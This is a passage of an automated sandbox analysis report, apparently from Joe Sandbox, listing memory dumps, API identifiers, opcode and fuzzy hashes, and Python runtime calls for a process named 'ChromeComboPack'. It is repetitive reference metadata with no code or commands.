                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2542180945-1018135373
                                                                                                                                                                                                                                                • Opcode ID: a3f181e4645522ee0c5c135495326946e4810cbaa9c199b01633478fd2f3168f
                                                                                                                                                                                                                                                • Instruction ID: a4f097c15927876bdc7ea34c94deb37ffd0e56c856d317adad9c4f68135585d3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3f181e4645522ee0c5c135495326946e4810cbaa9c199b01633478fd2f3168f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F0F937616B84DAC7189F25E8A05BC3764F748B88B9E9170FA4D47B55CF78D890C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2542180945-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 3b4c1db84a87a6fdb22006f661c73e75c067a881438bcbb587b3e6fc569e0f3a
                                                                                                                                                                                                                                                • Instruction ID: 24e7cdd65336d6415cdcd39ca3f61be79ec50f7ad4c3af5a4bc7cb27d7baa71d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b4c1db84a87a6fdb22006f661c73e75c067a881438bcbb587b3e6fc569e0f3a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAF0B433F29546B1EB595F25E19407D37A0FB48B44FAC8070D74807646DE7CE8A0C741
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: From$CharStringUnicode_Widewsprintf
                                                                                                                                                                                                                                                • String ID: IID('%ws')
                                                                                                                                                                                                                                                • API String ID: 3341265217-2301737843
                                                                                                                                                                                                                                                • Opcode ID: 50bfa6779426d2aff07c13c9fa1ccc7473edcd72459b3b2acf0a8f76b6dac1ef
                                                                                                                                                                                                                                                • Instruction ID: 2c410bae6d451d95e82fd80e32c09abdc02c20ea48c2c78ff7d5aa38fdaf9088
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50bfa6779426d2aff07c13c9fa1ccc7473edcd72459b3b2acf0a8f76b6dac1ef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EF03C66B19A86A1EB649B10E4643BD7B70FB88B64F800371D5AD076E5DE3CE249CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RECT must be a tuple of 4 ints (left, top, right, bottom), xrefs: 00007FFD8A19CFFE
                                                                                                                                                                                                                                                • llll;RECT must be a tuple of 4 ints (left, top, right, bottom), xrefs: 00007FFD8A19D02E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_Err_ParseSizeStringTuple_
                                                                                                                                                                                                                                                • String ID: RECT must be a tuple of 4 ints (left, top, right, bottom)$llll;RECT must be a tuple of 4 ints (left, top, right, bottom)
                                                                                                                                                                                                                                                • API String ID: 4247878537-1420951713
                                                                                                                                                                                                                                                • Opcode ID: 1fed8bc5305fefe79f8efb547535d6236b786e61c4e6cfa1f5450ff16927bdb7
                                                                                                                                                                                                                                                • Instruction ID: 8c69d7fed42cce88098d390100077edce7f19e4448c581d0a0c0187cf509a2c3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fed8bc5305fefe79f8efb547535d6236b786e61c4e6cfa1f5450ff16927bdb7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06F0DA66B05A45A1DA14CF55E4A01A97BA0FB84F94F848272CA4D47320EF3CE159C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_FreeMem_Memoryfreemalloc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 182096997-0
                                                                                                                                                                                                                                                • Opcode ID: a824d51c04412f2cfe757f604ae0b7e488ddafe631157d4ea853e098f62a4294
                                                                                                                                                                                                                                                • Instruction ID: 882f82670adc0b2f60f2fd72d053ab6c9abc59920b8b96ec90e1f3d5a47ef203
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a824d51c04412f2cfe757f604ae0b7e488ddafe631157d4ea853e098f62a4294
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7941CC73B0AA95A6DA149F59D4102BEBBA4FB94FA4F884272DE1C03790EF3CE545C304
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: memset$Referencemalloc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3353409452-0
                                                                                                                                                                                                                                                • Opcode ID: cfc265aedca1cfd4c5f867cf65e84f229c2e015578add5d1ee2c0dd8f0420849
                                                                                                                                                                                                                                                • Instruction ID: f17d33b7d0b87fe67e263014d97779d7d1a417fedf6bbb057a305a18089831c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfc265aedca1cfd4c5f867cf65e84f229c2e015578add5d1ee2c0dd8f0420849
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F112A22B19B4496D724CF26F49006AB770FB88B80B485039DB8D83B65EF7CE051C744
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4332138589.00007FFD87FE1000.00000020.00000001.01000000.00000068.sdmp, Offset: 00007FFD87FE0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4332092317.00007FFD87FE0000.00000002.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4332366776.00007FFD88262000.00000002.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4332366776.00007FFD88282000.00000002.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4332366776.00007FFD88291000.00000002.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4332366776.00007FFD88307000.00000002.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4332366776.00007FFD883D2000.00000002.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4332763614.00007FFD884D6000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4332867007.00007FFD88546000.00000008.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4332919778.00007FFD88547000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333022350.00007FFD88549000.00000008.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333101026.00007FFD885CB000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333158663.00007FFD885CC000.00000008.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333240051.00007FFD885CD000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333319654.00007FFD885CE000.00000008.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333436113.00007FFD885CF000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333478758.00007FFD885D1000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333560966.00007FFD885DB000.00000002.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333647417.00007FFD88600000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333721656.00007FFD88601000.00000008.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333799838.00007FFD88602000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333880313.00007FFD88603000.00000008.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4333959661.00007FFD88605000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334038500.00007FFD88611000.00000008.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334119493.00007FFD88612000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334209023.00007FFD88653000.00000004.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334282314.00007FFD88671000.00000002.00000001.01000000.00000068.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd87fe0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c3ed045bb38a667c100e22636b803ba1f380a34d6de05b6f2a16d532bdd1e237
                                                                                                                                                                                                                                                • Instruction ID: 8827c3b6218a7e643425da22495f39cfff2d1b22c1c3e5059d4a34cebb83a6cb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3ed045bb38a667c100e22636b803ba1f380a34d6de05b6f2a16d532bdd1e237
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E112E22B14F058AEB10CF64E8652B833A4FB19758F441E31EA6E877A4EF78E154C384
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CopyLengthReferencemalloc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3624451276-0
                                                                                                                                                                                                                                                • Opcode ID: f209ba4f67c1bd7ad927fbf5c44fd95c424540822dfd8a5772c24d0642e01099
                                                                                                                                                                                                                                                • Instruction ID: 1b7e91897c7d4422fa299bf9dd6a145ee0bceadc0ebb81c8512bd07cd664668f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f209ba4f67c1bd7ad927fbf5c44fd95c424540822dfd8a5772c24d0642e01099
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77012826B0AB4592EA489B66F9A417867B5FF89FC0F440175DA4E03B64DF3CF5A1C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: memset$Referencemalloc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3353409452-0
                                                                                                                                                                                                                                                • Opcode ID: 06fbbf861f31e947fc0cff152ccf4cf8ba627b0409590e7f134d7ba7840202b3
                                                                                                                                                                                                                                                • Instruction ID: 2f7679e48f705e1ba776864ffcf29472a06a452e1303a5e1b2f8364bfe1bb18f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06fbbf861f31e947fc0cff152ccf4cf8ba627b0409590e7f134d7ba7840202b3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E014F23B25B9592DB48CF26E45006D7B61FF88F84B485075DE0D43364EF39D451C744
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Referencemallocmemcpymemset
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1282408338-0
                                                                                                                                                                                                                                                • Opcode ID: 7bfaa5ebf8b34820a0e233f4471406ef91c962e6e2596f4fa0cefa083294b3f2
                                                                                                                                                                                                                                                • Instruction ID: 7e08fd2cf21bbfefc646a1104796f177b1ae8b7915682383faa8cf4bd63f8996
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bfaa5ebf8b34820a0e233f4471406ef91c962e6e2596f4fa0cefa083294b3f2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0F04F22B1AB8192EA888F16B490079A664FB48FD0B8C8071EE5D07B19DF3CE592C704
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeReferencemallocmemset
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 306314696-0
                                                                                                                                                                                                                                                • Opcode ID: 9b05a175ca92aa19f75d95a4ef61566b1229818556ea28acc5a1f5188c494334
                                                                                                                                                                                                                                                • Instruction ID: be75598e5b9be8f0cad1a7c3f8a6a6c22fa923755ec72a762ad7e81bc4a8b9d7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b05a175ca92aa19f75d95a4ef61566b1229818556ea28acc5a1f5188c494334
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCF04922B1AF9196E748DB12B850069BB64FB88FD0B588034EE4D43B29CF3CE592C744
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DescriptorSecurityfree$InitializeLengthReferencemalloc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2992339461-0
                                                                                                                                                                                                                                                • Opcode ID: e18387423927f03562960c83c48f9baa80d415592888f67cc2897486346f62b8
                                                                                                                                                                                                                                                • Instruction ID: 3ff893e8d687c06381a1f37343afde3a11d6abc4c8276db59534ca0ad0a1bcec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e18387423927f03562960c83c48f9baa80d415592888f67cc2897486346f62b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDF03026B06B0696EA489B12FA643796661FF4DFC0F588074CE4E47755DE7DE485C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CopyLengthReferencemalloc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3624451276-0
                                                                                                                                                                                                                                                • Opcode ID: ef35d0e389114da7284109d5a3633f4f3a3ae6f6cc59037d686e74084529aff4
                                                                                                                                                                                                                                                • Instruction ID: f7f99d639d3e3857d32acd026e123d2124e7474b270c6c728c93aaed5e5001d4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef35d0e389114da7284109d5a3633f4f3a3ae6f6cc59037d686e74084529aff4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07F08226B1AB8192DB588B52F954029A7B4FB4CFC0B444074DE4E43B24DF7CE491C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$DeleteFreeLocalState_Thread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3706641815-0
                                                                                                                                                                                                                                                • Opcode ID: b9f039f49c0c3725a936294eabfd3aea5f23939cf0c2b3ce667fcfdf6801e786
                                                                                                                                                                                                                                                • Instruction ID: 23ceaf85a8684dfaba5bffe5bd14f3ec1feeab3f4186ac1abd4e4f20d0c533fd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9f039f49c0c3725a936294eabfd3aea5f23939cf0c2b3ce667fcfdf6801e786
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F05076B0B60692FB5D9B15E8643752BA1BF88F51F4940B5C90D163A1DF3CB889C604
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A199840: PyImport_ImportModule.PYTHON312 ref: 00007FFD8A199861
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A199840: PyObject_GetAttrString.PYTHON312 ref: 00007FFD8A19987D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A199840: _Py_Dealloc.PYTHON312 ref: 00007FFD8A19988F
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A199840: PyTuple_New.PYTHON312 ref: 00007FFD8A19989C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A199840: PyObject_CallMethod.PYTHON312 ref: 00007FFD8A1998BB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A199840: _Py_Dealloc.PYTHON312 ref: 00007FFD8A1998D1
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A199840: _Py_Dealloc.PYTHON312 ref: 00007FFD8A1998E7
                                                                                                                                                                                                                                                • PyObject_GetAttrString.PYTHON312(?,?,?,?,?,?,?,?,?,00007FFD8A1999ED), ref: 00007FFD8A19A1B4
                                                                                                                                                                                                                                                • _Py_Dealloc.PYTHON312(?,?,?,?,?,?,?,?,?,00007FFD8A1999ED), ref: 00007FFD8A19A213
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
